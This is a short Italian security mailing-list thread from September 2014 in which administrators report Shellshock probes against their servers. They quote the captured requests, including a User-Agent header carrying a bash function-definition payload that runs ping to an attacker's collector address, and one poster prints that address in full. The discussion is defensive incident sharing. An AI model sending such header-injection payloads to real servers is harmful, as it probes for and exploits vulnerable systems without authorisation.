Identica identica anche su vari miei server. Pare sia lo stesso che
spamma come un dannato.
On 25/09/2014 12:20, P@sKy wrote:
Il 25/09/2014 12.04, Jan Reister ha scritto:
Da noi è già arrivato un drone che esegue
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0{0D}{0A}
User-Agent: () { :;}; /bin/ping -c 1 192.168.0.1{0D}{0A}
Accept: */*{0D}{0A}
{0D}{0A}
(sessione ricostruita con l'IDS, con 192.168.0.1 sostituisco l'indirizzo
reale del collettore dell'attaccante)
E perchè mai hai oscurato l'indirizzo reale del collettore
dell'attaccante?
Anche da noi è arrivata la stessa cosa...
[25/Sep/2014:12:33:19 +0200] "GET /cgi-sys/defaultwebpage.cgi
HTTP/1.0" 404 382 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
sessione ricostruita dai file di log, ma personalmente me
ne guardo bene dall'oscurare l'indirizzo reale del collettore
dell'attaccante, perchè potrebbe essere utile ad altri..
for fun and profit... ;)
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
